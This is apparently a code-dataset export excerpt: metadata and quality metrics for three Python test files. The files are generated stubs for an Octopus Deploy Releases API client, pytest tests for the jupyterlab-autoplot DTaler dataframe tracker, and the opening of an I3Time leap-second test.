| qsc_code_frac_chars_dupe_6grams | 0.8155 | 1 |
| qsc_code_frac_chars_dupe_7grams | 0.796933 | 1 |
| qsc_code_frac_chars_dupe_8grams | 0.782831 | 1 |
| qsc_code_frac_chars_dupe_9grams | 0.756331 | 1 |
| qsc_code_frac_chars_dupe_10grams | 0.744345 | 1 |
| qsc_code_frac_chars_replacement_symbols | 0 | 0 |
| qsc_code_frac_chars_digital | 0.018215 | 0 |
| qsc_code_frac_chars_whitespace | 0.266211 | 0 |
| qsc_code_size_file_byte | 29,702 | 0 |
| qsc_code_num_lines | 754 | 0 |
| qsc_code_num_chars_line_max | 134 | 0 |
| qsc_code_num_chars_line_mean | 39.392573 | 0 |
| qsc_code_frac_chars_alphabet | 0.762652 | 0 |
| qsc_code_frac_chars_comments | 0.000438 | 0 |
| qsc_code_cate_xml_start | 0 | 0 |
| qsc_code_frac_lines_dupe_lines | 0.728058 | 1 |
| qsc_code_cate_autogen | 0 | 0 |
| qsc_code_frac_lines_long_string | 0.001439 | 0 |
| qsc_code_frac_chars_string_length | 0.182342 | 0 |
| qsc_code_frac_chars_long_word_length | 0.055548 | 0 |
| qsc_code_frac_lines_string_concat | 0 | null |
| qsc_code_cate_encoded_data | 0 | 0 |
| qsc_code_frac_chars_hex_words | 0 | 0 |
| qsc_code_frac_lines_prompt_comments | 0 | 0 |
| qsc_code_frac_lines_assert | 0.066187 | 0 |
| qsc_codepython_cate_ast | 1 | 0 |
| qsc_codepython_frac_lines_func_ratio | 0.033094 | 0 |
| qsc_codepython_cate_var_zero | false | 0 |
| qsc_codepython_frac_lines_pass | 0.028777 | 0 |
| qsc_codepython_frac_lines_import | 0.017266 | 0 |
| qsc_codepython_frac_lines_simplefunc | 0 | 0 |
| qsc_codepython_score_lines_no_logic | 0.05036 | 0 |
| qsc_codepython_frac_lines_print | 0.004317 | 0 |
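The definitions behind these signals are not part of this dump; as a rough sketch of what a line-fraction signal such as qsc_code_frac_lines_assert plausibly measures (the notion of "effective" lines used here is an assumption):

def frac_lines_assert(source: str) -> float:
    # Sketch only: counts assert statements over non-empty lines; the
    # dataset's real definition may differ.
    lines = [line.strip() for line in source.splitlines()]
    effective = [line for line in lines if line]
    if not effective:
        return 0.0
    return sum(line.startswith("assert") for line in effective) / len(effective)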
Record 2: test/test_releases_api.py

| field | value |
|---|---|
| hexsha | 8679b85bf67b7e1a956afa090547b658be1e4d79 |
| size | 9,601 |
| ext | py |
| lang | Python |

| | repo_path | repo_name | repo_head_hexsha | repo_licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | test/test_releases_api.py | cvent/octopus-deploy-api-client | 0e03e842e1beb29b132776aee077df570b88366a | ["Apache-2.0"] | null | null | null |
| max_issues | test/test_releases_api.py | cvent/octopus-deploy-api-client | 0e03e842e1beb29b132776aee077df570b88366a | ["Apache-2.0"] | null | null | null |
| max_forks | test/test_releases_api.py | cvent/octopus-deploy-api-client | 0e03e842e1beb29b132776aee077df570b88366a | ["Apache-2.0"] | null | null | null |

content:
# coding: utf-8
"""
Octopus Server API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 2019.6.7+Branch.tags-2019.6.7.Sha.aa18dc6809953218c66f57eff7d26481d9b23d6a
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import octopus_deploy_swagger_client
from octopus_deploy_swagger_client.releases_api import ReleasesApi  # noqa: E501
from octopus_deploy_swagger_client.rest import ApiException
class TestReleasesApi(unittest.TestCase):
"""ReleasesApi unit test stubs"""
def setUp(self):
        self.api = octopus_deploy_swagger_client.releases_api.ReleasesApi()  # noqa: E501
def tearDown(self):
pass
def test_child_index_response_descriptor_projects_project_projects_release_project_resource_release_resource(self):
"""Test case for child_index_response_descriptor_projects_project_projects_release_project_resource_release_resource
Get a list of ReleaseResources # noqa: E501
"""
pass
def test_child_index_response_descriptor_projects_project_projects_release_project_resource_release_resource_spaces(self):
"""Test case for child_index_response_descriptor_projects_project_projects_release_project_resource_release_resource_spaces
Get a list of ReleaseResources # noqa: E501
"""
pass
def test_child_index_response_descriptor_projects_release_projects_deployment_release_resource_deployment_resource(self):
"""Test case for child_index_response_descriptor_projects_release_projects_deployment_release_resource_deployment_resource
Get a list of DeploymentResources # noqa: E501
"""
pass
def test_child_index_response_descriptor_projects_release_projects_deployment_release_resource_deployment_resource_spaces(self):
"""Test case for child_index_response_descriptor_projects_release_projects_deployment_release_resource_deployment_resource_spaces
Get a list of DeploymentResources # noqa: E501
"""
pass
def test_create_response_descriptor_projects_release_release_resource(self):
"""Test case for create_response_descriptor_projects_release_release_resource
Create a ReleaseResource # noqa: E501
"""
pass
def test_create_response_descriptor_projects_release_release_resource_spaces(self):
"""Test case for create_response_descriptor_projects_release_release_resource_spaces
Create a ReleaseResource # noqa: E501
"""
pass
def test_custom_action_response_descriptor_octopus_server_web_api_actions_defect_reported_responder(self):
"""Test case for custom_action_response_descriptor_octopus_server_web_api_actions_defect_reported_responder
"""
pass
def test_custom_action_response_descriptor_octopus_server_web_api_actions_defect_reported_responder_spaces(self):
"""Test case for custom_action_response_descriptor_octopus_server_web_api_actions_defect_reported_responder_spaces
"""
pass
def test_custom_action_response_descriptor_octopus_server_web_api_actions_defect_resolved_responder(self):
"""Test case for custom_action_response_descriptor_octopus_server_web_api_actions_defect_resolved_responder
"""
pass
def test_custom_action_response_descriptor_octopus_server_web_api_actions_defect_resolved_responder_spaces(self):
"""Test case for custom_action_response_descriptor_octopus_server_web_api_actions_defect_resolved_responder_spaces
"""
pass
def test_custom_action_response_descriptor_octopus_server_web_api_actions_deployment_preview_action(self):
"""Test case for custom_action_response_descriptor_octopus_server_web_api_actions_deployment_preview_action
"""
pass
def test_custom_action_response_descriptor_octopus_server_web_api_actions_deployment_preview_action_0(self):
"""Test case for custom_action_response_descriptor_octopus_server_web_api_actions_deployment_preview_action_0
"""
pass
def test_custom_action_response_descriptor_octopus_server_web_api_actions_deployment_preview_action_spaces(self):
"""Test case for custom_action_response_descriptor_octopus_server_web_api_actions_deployment_preview_action_spaces
"""
pass
def test_custom_action_response_descriptor_octopus_server_web_api_actions_deployment_preview_action_spaces_0(self):
"""Test case for custom_action_response_descriptor_octopus_server_web_api_actions_deployment_preview_action_spaces_0
"""
pass
def test_custom_action_response_descriptor_octopus_server_web_api_actions_deployment_template_action(self):
"""Test case for custom_action_response_descriptor_octopus_server_web_api_actions_deployment_template_action
"""
pass
def test_custom_action_response_descriptor_octopus_server_web_api_actions_deployment_template_action_spaces(self):
"""Test case for custom_action_response_descriptor_octopus_server_web_api_actions_deployment_template_action_spaces
"""
pass
def test_custom_action_response_descriptor_octopus_server_web_api_actions_release_by_project_and_version_responder(self):
"""Test case for custom_action_response_descriptor_octopus_server_web_api_actions_release_by_project_and_version_responder
"""
pass
def test_custom_action_response_descriptor_octopus_server_web_api_actions_release_by_project_and_version_responder_spaces(self):
"""Test case for custom_action_response_descriptor_octopus_server_web_api_actions_release_by_project_and_version_responder_spaces
"""
pass
def test_custom_action_response_descriptor_octopus_server_web_api_actions_release_lifecycle_progression_action(self):
"""Test case for custom_action_response_descriptor_octopus_server_web_api_actions_release_lifecycle_progression_action
"""
pass
def test_custom_action_response_descriptor_octopus_server_web_api_actions_release_lifecycle_progression_action_spaces(self):
"""Test case for custom_action_response_descriptor_octopus_server_web_api_actions_release_lifecycle_progression_action_spaces
"""
pass
def test_custom_action_response_descriptor_octopus_server_web_api_actions_release_snapshot_variables_action(self):
"""Test case for custom_action_response_descriptor_octopus_server_web_api_actions_release_snapshot_variables_action
"""
pass
def test_custom_action_response_descriptor_octopus_server_web_api_actions_release_snapshot_variables_action_spaces(self):
"""Test case for custom_action_response_descriptor_octopus_server_web_api_actions_release_snapshot_variables_action_spaces
"""
pass
def test_custom_query_response_descriptor_octopus_server_web_api_actions_list_defects_responder(self):
"""Test case for custom_query_response_descriptor_octopus_server_web_api_actions_list_defects_responder
"""
pass
def test_custom_query_response_descriptor_octopus_server_web_api_actions_list_defects_responder_spaces(self):
"""Test case for custom_query_response_descriptor_octopus_server_web_api_actions_list_defects_responder_spaces
"""
pass
def test_delete_on_background_response_descriptor_projects_release_release_resource(self):
"""Test case for delete_on_background_response_descriptor_projects_release_release_resource
Delete a ReleaseResource by ID # noqa: E501
"""
pass
def test_delete_on_background_response_descriptor_projects_release_release_resource_spaces(self):
"""Test case for delete_on_background_response_descriptor_projects_release_release_resource_spaces
Delete a ReleaseResource by ID # noqa: E501
"""
pass
def test_index_response_descriptor_projects_release_release_resource(self):
"""Test case for index_response_descriptor_projects_release_release_resource
Get a list of ReleaseResources # noqa: E501
"""
pass
def test_index_response_descriptor_projects_release_release_resource_spaces(self):
"""Test case for index_response_descriptor_projects_release_release_resource_spaces
Get a list of ReleaseResources # noqa: E501
"""
pass
def test_load_response_descriptor_projects_release_release_resource(self):
"""Test case for load_response_descriptor_projects_release_release_resource
Get a ReleaseResource by ID # noqa: E501
"""
pass
def test_load_response_descriptor_projects_release_release_resource_spaces(self):
"""Test case for load_response_descriptor_projects_release_release_resource_spaces
Get a ReleaseResource by ID # noqa: E501
"""
pass
def test_modify_response_descriptor_projects_release_release_resource(self):
"""Test case for modify_response_descriptor_projects_release_release_resource
Modify a ReleaseResource by ID # noqa: E501
"""
pass
def test_modify_response_descriptor_projects_release_release_resource_spaces(self):
"""Test case for modify_response_descriptor_projects_release_release_resource_spaces
Modify a ReleaseResource by ID # noqa: E501
"""
pass
if __name__ == '__main__':
unittest.main()
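These generated stubs run directly because the module calls unittest.main(); a sketch of running them via discovery instead (the "test" directory is taken from the repo path above, and the command assumes a checkout of the repository):

import unittest

# Discover and run only this module's stubs.
suite = unittest.defaultTestLoader.discover("test", pattern="test_releases_api.py")
unittest.TextTestRunner(verbosity=2).run(suite)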
The remaining fields of this row:

| field | value |
|---|---|
| avg_line_length | 39.838174 |
| max_line_length | 137 |
| alphanum_fraction | 0.793876 |
| effective | 0 |
| hits | 11 |

Each qsc_*_quality_signal value is paired below with its bare qsc_* flag column:

| quality signal | value | flag |
|---|---|---|
| qsc_code_num_words | 1,155 | 0 |
| qsc_code_num_chars | 9,601 | 0 |
| qsc_code_mean_word_length | 5.971429 | 0 |
| qsc_code_frac_words_unique | 0.084848 | null |
| qsc_code_frac_chars_top_2grams | 0.167029 | 0 |
| qsc_code_frac_chars_top_3grams | 0.130492 | 0 |
| qsc_code_frac_chars_top_4grams | 0.161809 | 1 |
| qsc_code_frac_chars_dupe_5grams | 0.931999 | 1 |
| qsc_code_frac_chars_dupe_6grams | 0.9233 | 1 |
| qsc_code_frac_chars_dupe_7grams | 0.9233 | 1 |
| qsc_code_frac_chars_dupe_8grams | 0.912281 | 1 |
| qsc_code_frac_chars_dupe_9grams | 0.896622 | 1 |
| qsc_code_frac_chars_dupe_10grams | 0.895752 | 1 |
| qsc_code_frac_chars_replacement_symbols | 0 | 0 |
| qsc_code_frac_chars_digital | 0.011728 | 0 |
| qsc_code_frac_chars_whitespace | 0.165191 | 0 |
| qsc_code_size_file_byte | 9,601 | 0 |
| qsc_code_num_lines | 240 | 0 |
| qsc_code_num_chars_line_max | 138 | 0 |
| qsc_code_num_chars_line_mean | 40.004167 | 0 |
| qsc_code_frac_chars_alphabet | 0.848784 | 0 |
| qsc_code_frac_chars_comments | 0.467035 | 0 |
| qsc_code_cate_xml_start | 0 | 0 |
| qsc_code_frac_lines_dupe_lines | 0.434211 | 0 |
| qsc_code_cate_autogen | 1 | 1 |
| qsc_code_frac_lines_long_string | 0 | 0 |
| qsc_code_frac_chars_string_length | 0.001708 | 0 |
| qsc_code_frac_chars_long_word_length | 0 | 0 |
| qsc_code_frac_lines_string_concat | 0 | null |
| qsc_code_cate_encoded_data | 0 | 0 |
| qsc_code_frac_chars_hex_words | 0 | 0 |
| qsc_code_frac_lines_prompt_comments | 0 | 0 |
| qsc_code_frac_lines_assert | 0 | 0 |
| qsc_codepython_cate_ast | 1 | 0 |
| qsc_codepython_frac_lines_func_ratio | 0.447368 | 1 |
| qsc_codepython_cate_var_zero | false | 0 |
| qsc_codepython_frac_lines_pass | 0.434211 | 1 |
| qsc_codepython_frac_lines_import | 0.065789 | 0 |
| qsc_codepython_frac_lines_simplefunc | 0 | 0 |
| qsc_codepython_score_lines_no_logic | 0.526316 | 1 |
| qsc_codepython_frac_lines_print | 0 | 0 |
Record 3: ipython-extension/tests/unit/autoplot/test_dtaler.py

| field | value |
|---|---|
| hexsha | 86865a280a4b911c6f25567b181b77327711f1d1 |
| size | 12,744 |
| ext | py |
| lang | Python |

| | repo_path | repo_name | repo_head_hexsha | repo_licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | ipython-extension/tests/unit/autoplot/test_dtaler.py | kernelpanek/jupyterlab-autoplot | 023b0b6a1ebc1857b4dab95c04286d45ec70fc42 | ["BSD-3-Clause"] | 48 | 2021-01-27T14:40:00.000Z | 2022-03-31T10:15:35.000Z |
| max_issues | ipython-extension/tests/unit/autoplot/test_dtaler.py | kernelpanek/jupyterlab-autoplot | 023b0b6a1ebc1857b4dab95c04286d45ec70fc42 | ["BSD-3-Clause"] | 1 | 2021-03-11T06:31:35.000Z | 2021-07-29T18:47:29.000Z |
| max_forks | ipython-extension/tests/unit/autoplot/test_dtaler.py | kernelpanek/jupyterlab-autoplot | 023b0b6a1ebc1857b4dab95c04286d45ec70fc42 | ["BSD-3-Clause"] | 5 | 2021-04-22T17:44:12.000Z | 2022-02-09T22:47:16.000Z |

content:
from typing import Union
from unittest.mock import patch
import dtale.global_state
import pandas as pd
import pytest
from IPython.core.display import Image
from autoplot.dtaler import DTaler, VarData
from autoplot.extensions.autoplot_display import AutoplotDisplay
from autoplot.extensions.toast import Toast
from ipywidgets import Output
@patch("autoplot.dtaler.display")
def test_force_draw_no_variable_update(display_mock, dtaler):
dtaler.draw(True, AutoplotDisplay())
assert isinstance(_get_parameter(display_mock), Image)
@patch("autoplot.dtaler.display")
def test_force_draw_with_variable_update(display_mock, dtaler):
dtaler.update_variables({})
dtaler.draw(True, AutoplotDisplay())
assert isinstance(_get_parameter(display_mock), Image)
@patch("autoplot.dtaler.display")
def test_force_draw_with_variable_update_and_unexpected_data_id(display_mock, dtaler):
dtaler.update_variables({})
output = AutoplotDisplay()
output.data_id = "1"
dtaler.draw(True, output)
assert isinstance(_get_parameter(display_mock), Image)
@patch("autoplot.dtaler.display")
def test_draw_dataframe(display_mock, dtaler):
df = pd.DataFrame({"a": [1, 2, 3]})
dtaler.update_variables({"df": df})
dtaler.draw(False, AutoplotDisplay())
assert all(_get_parameter(display_mock).data == df)
@patch("autoplot.dtaler.display")
def test_draw_new_dataframe(display_mock, dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
df2 = pd.DataFrame({"b": [1, 2, 3]})
output = AutoplotDisplay()
vars = {"df1": df1}
dtaler.update_variables(vars)
vars["df2"] = df2
dtaler.update_variables(vars)
output.data_id = dtaler._tracked["df1"].dd._data_id
dtaler.draw(False, output)
assert all(_get_parameter(display_mock).data == df2)
assert len(dtaler._tracked) == 2
@patch("autoplot.dtaler.display")
def test_draw_reassigned_dataframe(display_mock, dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
df2 = pd.DataFrame({"a": [4, 5, 6]})
output = AutoplotDisplay()
vars = {"df1": df1, "df2": df2}
dtaler.update_variables(vars)
new_df1 = pd.DataFrame({"a": [7, 8, 9]})
vars["df1"] = new_df1
dtaler.update_variables(vars)
output.data_id = dtaler._tracked["df1"].dd._data_id
dtaler.draw(False, output)
assert all(_get_parameter(display_mock).data == df1)
assert len(dtaler._tracked) == 2
assert dtaler._tracked["df1"].pdf is new_df1
@patch("autoplot.dtaler.display")
def test_draw_does_not_reload_hidden_df(display_mock, dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
df2 = pd.DataFrame({"a": [4, 5, 6]})
output = AutoplotDisplay()
vars = {"df1": df1, "df2": df2}
dtaler.update_variables(vars)
vars["df1"] = pd.DataFrame({"a": [1, 2, 3]})
dtaler.update_variables(vars)
output.data_id = dtaler._tracked["df2"].dd._data_id
dtaler.draw(False, output)
assert not display_mock.called
assert len(dtaler._tracked) == 2
@patch("autoplot.dtaler.display")
def test_draw_external_data_id_does_not_reload(display_mock, dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
df2 = pd.DataFrame({"a": [4, 5, 6]})
df3 = pd.DataFrame({"a": [7, 8, 9]})
output = AutoplotDisplay()
vars = {"df1": df1, "df2": df2}
dtaler.update_variables(vars)
vars["df1"] = pd.DataFrame({"a": [1, 2, 3]})
output.data_id = dtale.show(df3, ignore_duplicate=True)._data_id
dtaler.update_variables(vars)
dtaler.draw(False, output)
assert not display_mock.called
def test_do_not_reinsert_externally_removed_frames_when_variable_is_updated(dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
df2 = pd.DataFrame({"b": [1, 2, 3]})
vars = {"df1": df1, "df2": df2}
dtaler.update_variables(vars)
dtale.global_state.cleanup(dtaler._tracked["df1"].dd._data_id)
vars["df1"] = pd.DataFrame({"a": [4, 5, 6]})
dtaler.update_variables(vars)
assert len(dtaler._tracked) == 1
assert dtaler._ignored == {"df1"}
assert "df1" not in dtaler._tracked
def test_do_not_reinsert_externally_removed_frames_when_variable_is_the_same(dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
df2 = pd.DataFrame({"b": [1, 2, 3]})
vars = {"df1": df1, "df2": df2}
dtaler.update_variables(vars)
old_dd = dtaler._tracked["df1"].dd
dtale.global_state.cleanup(old_dd._data_id)
dtaler.update_variables(vars)
assert len(dtaler._tracked) == 1
assert dtaler._ignored == {"df1"}
assert "df1" not in dtaler._tracked
@patch("autoplot.dtaler.display")
def test_draw_doesnt_reload_hidden_dfs(display_mock, dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
df2 = pd.DataFrame({"a": [4, 5, 6]})
output = AutoplotDisplay()
vars = {"df1": df1, "df2": df2}
dtaler.update_variables(vars)
output.data_id = dtaler._tracked["df1"].dd._data_id
vars.pop("df2")
dtaler.update_variables(vars)
dtaler.draw(False, output)
assert not display_mock.called
assert len(dtaler._tracked) == 1
@patch("autoplot.dtaler.display")
def test_draw_reloads_when_visible_df_deleted(display_mock, dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
df2 = pd.DataFrame({"b": [1, 2, 3]})
output = AutoplotDisplay()
vars = {"df1": df1, "df2": df2}
dtaler.update_variables(vars)
output.data_id = dtaler._tracked["df2"].dd._data_id
vars.pop("df2")
dtaler.update_variables(vars)
dtaler.draw(False, output)
assert all(_get_parameter(display_mock).data == df1)
assert len(dtaler._tracked) == 1
@patch("autoplot.dtaler.display")
def test_ignore_new_variables_when_frozen(display_mock, dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
output = AutoplotDisplay()
dtaler.freeze(Toast(Output()))
dtaler.update_variables({"df1": df1})
dtaler.draw(True, output)
assert isinstance(_get_parameter(display_mock), Image)
assert "df1" not in dtaler._tracked
assert "df1" in dtaler._ignored
@patch("autoplot.dtaler.display")
def test_update_non_ignored_variables(display_mock, dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
output = AutoplotDisplay()
dtaler.update_variables({"df1": df1})
dtaler.freeze(Toast(Output()))
new_df1 = pd.DataFrame({"b": [4, 5, 6]})
dtaler.update_variables({"df1": new_df1})
dtaler.draw(True, output)
assert all(_get_parameter(display_mock).data == new_df1)
assert dtaler._tracked["df1"].pdf is new_df1
assert "df1" not in dtaler._ignored
def test_update_ignored_variables_still_ignored(dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
dtaler.freeze(Toast(Output()))
dtaler.update_variables({"df1": df1})
new_df1 = pd.DataFrame({"b": [4, 5, 6]})
dtaler.update_variables({"df1": new_df1})
assert "df1" not in dtaler._tracked
assert "df1" in dtaler._ignored
def test_remove_ignored_variables(dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
dtaler.freeze(Toast(Output()))
dtaler.update_variables({"df1": df1})
dtaler.update_variables({})
assert len(dtaler._tracked) == 0
assert len(dtaler._ignored) == 0
@patch("autoplot.dtaler.display")
def test_continue_to_ignore_after_defrost(display_mock, dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
output = AutoplotDisplay()
dtaler.freeze(Toast(Output()))
dtaler.update_variables({"df1": df1})
dtaler.defrost(Toast(Output()))
dtaler.update_variables({"df1": df1})
dtaler.draw(True, output)
assert isinstance(_get_parameter(display_mock), Image)
assert "df1" not in dtaler._tracked
assert "df1" in dtaler._ignored
@patch("autoplot.dtaler.display")
def test_accept_new_variables_after_defrost(display_mock, dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
df2 = pd.DataFrame({"b": [4, 5, 6]})
output = AutoplotDisplay()
dtaler.freeze(Toast(Output()))
dtaler.update_variables({"df1": df1})
dtaler.defrost(Toast(Output()))
dtaler.update_variables({"df1": df1, "df2": df2})
dtaler.draw(False, output)
assert all(_get_parameter(display_mock).data == df2)
assert "df1" not in dtaler._tracked
assert "df2" in dtaler._tracked
assert "df1" in dtaler._ignored
assert "df2" not in dtaler._ignored
@patch("autoplot.dtaler.display")
def test_ignore_current_variable_no_fallback(display_mock, dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
output = AutoplotDisplay()
dtaler.update_variables({"df1": df1})
output.data_id = dtaler._tracked["df1"].dd._data_id
dtaler.ignore_variable(Toast(Output()), "df1")
dtaler.update_variables({"df1": df1})
dtaler.draw(False, output)
assert isinstance(_get_parameter(display_mock), Image)
assert "df1" not in dtaler._tracked
assert "df1" in dtaler._ignored
@patch("autoplot.dtaler.display")
def test_ignore_current_variable_with_fallback(display_mock, dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
df2 = pd.DataFrame({"a": [4, 5, 6]})
output = AutoplotDisplay()
dtaler.update_variables({"df1": df1, "df2": df2})
output.data_id = dtaler._tracked["df1"].dd._data_id
dtaler.ignore_variable(Toast(Output()), "df1")
dtaler.update_variables({"df1": df1, "df2": df2})
dtaler.draw(False, output)
assert all(_get_parameter(display_mock).data == df2)
assert "df1" not in dtaler._tracked
assert "df1" in dtaler._ignored
@patch("autoplot.dtaler.display")
def test_ignore_other_variable_with_fallback(display_mock, dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
df2 = pd.DataFrame({"a": [4, 5, 6]})
output = AutoplotDisplay()
dtaler.update_variables({"df1": df1, "df2": df2})
output.data_id = dtaler._tracked["df1"].dd._data_id
dtaler.ignore_variable(Toast(Output()), "df2")
dtaler.update_variables({"df1": df1, "df2": df2})
dtaler.draw(False, output)
assert not display_mock.called
assert "df2" not in dtaler._tracked
assert "df2" in dtaler._ignored
@patch("autoplot.dtaler.display")
def test_show_ignored_variable(display_mock, dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
df2 = pd.DataFrame({"a": [4, 5, 6]})
output = AutoplotDisplay()
dtaler.update_variables({"df1": df1, "df2": df2})
output.data_id = dtaler._tracked["df1"].dd._data_id
dtaler.ignore_variable(Toast(Output()), "df2")
dtaler.update_variables({"df1": df1, "df2": df2})
dtaler.show_variable(Toast(Output()), "df2")
dtaler.update_variables({"df1": df1, "df2": df2})
dtaler.draw(False, output)
assert all(_get_parameter(display_mock).data == df2)
assert "df2" in dtaler._tracked
assert "df2" not in dtaler._ignored
@patch("autoplot.dtaler.display")
def test_show_variable(display_mock, dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
df2 = pd.DataFrame({"a": [4, 5, 6]})
output = AutoplotDisplay()
dtaler.update_variables({"df1": df1, "df2": df2})
output.data_id = dtaler._tracked["df2"].dd._data_id
dtaler.show_variable(Toast(Output()), "df1")
dtaler.update_variables({"df1": df1, "df2": df2})
dtaler.draw(False, output)
assert all(_get_parameter(display_mock).data == df1)
assert "df2" in dtaler._tracked
assert "df2" not in dtaler._ignored
@patch("autoplot.dtaler.display")
def test_show_frozen_variable(display_mock, dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
df2 = pd.DataFrame({"a": [4, 5, 6]})
output = AutoplotDisplay()
dtaler.update_variables({"df1": df1})
output.data_id = dtaler._tracked["df1"].dd._data_id
dtaler.freeze(Toast(Output()))
dtaler.update_variables({"df1": df1, "df2": df2})
assert "df2" not in dtaler._tracked
assert "df2" in dtaler._ignored
dtaler.show_variable(Toast(Output()), "df2")
dtaler.update_variables({"df1": df1, "df2": df2})
dtaler.draw(False, output)
assert all(_get_parameter(display_mock).data == df2)
assert "df2" in dtaler._tracked
assert "df2" not in dtaler._ignored
@patch("autoplot.dtaler.display")
def test_delete_from_dtale_and_namespace(display_mock, dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
df2 = pd.DataFrame({"a": [4, 5, 6]})
output = AutoplotDisplay()
dtaler.update_variables({"df1": df1, "df2": df2})
output.data_id = dtaler._tracked["df1"].dd._data_id
dtale.global_state.cleanup(dtaler._tracked["df1"].dd._data_id)
dtaler.update_variables({"df2": df2})
dtaler.draw(False, output)
assert all(_get_parameter(display_mock).data == df2)
assert "df1" not in dtaler._tracked
assert "df1" not in dtaler._ignored
def _get_parameter(display_mock) -> Union[Image, VarData]:
return display_mock.call_args[0][0]
@pytest.fixture
def dtaler():
dtaler = DTaler()
yield dtaler
dtale.global_state.cleanup()
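The tests above lean on two unittest.mock idioms: @patch("autoplot.dtaler.display") hands the replacement mock to each test as its first argument, and _get_parameter reads the first positional argument of the mock's most recent call. A self-contained sketch of that pattern (the show function here is a stand-in, not part of autoplot):

from unittest.mock import patch

def show(value):
    print(value)  # stand-in for the patched display function

@patch(f"{__name__}.show")
def demo(show_mock):
    show("hello")  # goes to the mock, not the real function
    # call_args[0] is the tuple of positional arguments of the last call
    assert show_mock.call_args[0][0] == "hello"

demo()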
The remaining fields of this row:

| field | value |
|---|---|
| avg_line_length | 29.364055 |
| max_line_length | 86 |
| alphanum_fraction | 0.680006 |
| effective | 0 |
| hits | 7 |

Each qsc_*_quality_signal value is paired below with its bare qsc_* flag column:

| quality signal | value | flag |
|---|---|---|
| qsc_code_num_words | 1,741 | 0 |
| qsc_code_num_chars | 12,744 | 0 |
| qsc_code_mean_word_length | 4.758185 | 0 |
| qsc_code_frac_words_unique | 0.068352 | null |
| qsc_code_frac_chars_top_2grams | 0.066634 | 0 |
| qsc_code_frac_chars_top_3grams | 0.11661 | 0 |
| qsc_code_frac_chars_top_4grams | 0.045268 | 0 |
| qsc_code_frac_chars_dupe_5grams | 0.876268 | 1 |
| qsc_code_frac_chars_dupe_6grams | 0.867697 | 1 |
| qsc_code_frac_chars_dupe_7grams | 0.839087 | 1 |
| qsc_code_frac_chars_dupe_8grams | 0.811082 | 1 |
| qsc_code_frac_chars_dupe_9grams | 0.78718 | 1 |
| qsc_code_frac_chars_dupe_10grams | 0.776799 | 1 |
| qsc_code_frac_chars_replacement_symbols | 0 | 0 |
| qsc_code_frac_chars_digital | 0.034632 | 0 |
| qsc_code_frac_chars_whitespace | 0.16392 | 0 |
| qsc_code_size_file_byte | 12,744 | 0 |
| qsc_code_num_lines | 433 | 0 |
| qsc_code_num_chars_line_max | 87 | 0 |
| qsc_code_num_chars_line_mean | 29.431871 | 0 |
| qsc_code_frac_chars_alphabet | 0.742844 | 0 |
| qsc_code_frac_chars_comments | 0 | 0 |
| qsc_code_cate_xml_start | 0 | 0 |
| qsc_code_frac_lines_dupe_lines | 0.79402 | 1 |
| qsc_code_cate_autogen | 0 | 0 |
| qsc_code_frac_lines_long_string | 0 | 0 |
| qsc_code_frac_chars_string_length | 0.068895 | 0 |
| qsc_code_frac_chars_long_word_length | 0.0379 | 0 |
| qsc_code_frac_lines_string_concat | 0 | null |
| qsc_code_cate_encoded_data | 0 | 0 |
| qsc_code_frac_chars_hex_words | 0 | 0 |
| qsc_code_frac_lines_prompt_comments | 0 | 0 |
| qsc_code_frac_lines_assert | 0.209302 | 0 |
| qsc_codepython_cate_ast | 1 | 0 |
| qsc_codepython_frac_lines_func_ratio | 0.089701 | 0 |
| qsc_codepython_cate_var_zero | false | 0 |
| qsc_codepython_frac_lines_pass | 0 | 0 |
| qsc_codepython_frac_lines_import | 0.033223 | 0 |
| qsc_codepython_frac_lines_simplefunc | 0.003322 | 0 |
| qsc_codepython_score_lines_no_logic | 0.126246 | 0 |
| qsc_codepython_frac_lines_print | 0 | 0 |
Record 4: dataclasses/resources/test/leap_second_test.py

| field | value |
|---|---|
| hexsha | 86de781a47d47377f404e4a1212d476179f38a6b |
| size | 20,540 |
| ext | py |
| lang | Python |

| | repo_path | repo_name | repo_head_hexsha | repo_licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | dataclasses/resources/test/leap_second_test.py | hschwane/offline_production | e14a6493782f613b8bbe64217559765d5213dc1e | ["MIT"] | 1 | 2020-12-24T22:00:01.000Z | 2020-12-24T22:00:01.000Z |
| max_issues | dataclasses/resources/test/leap_second_test.py | hschwane/offline_production | e14a6493782f613b8bbe64217559765d5213dc1e | ["MIT"] | null | null | null |
| max_forks | dataclasses/resources/test/leap_second_test.py | hschwane/offline_production | e14a6493782f613b8bbe64217559765d5213dc1e | ["MIT"] | 3 | 2020-07-17T09:20:29.000Z | 2021-03-30T16:44:18.000Z |

content:
#!/usr/bin/env python
"""
Leap Second Unit Test Suite
This file tests I3Time for leap second awareness.
It uses a file of days with leap seconds from the Navy and tests to
make sure I3Time works well with leap seconds.
It depends on http://maia.usno.navy.mil/ser7/tai-utc.dat, which is
kept in ${I3_TESTDATA}. The USNO updates this file every six
months, hence the age test.
"""
import os,datetime,random
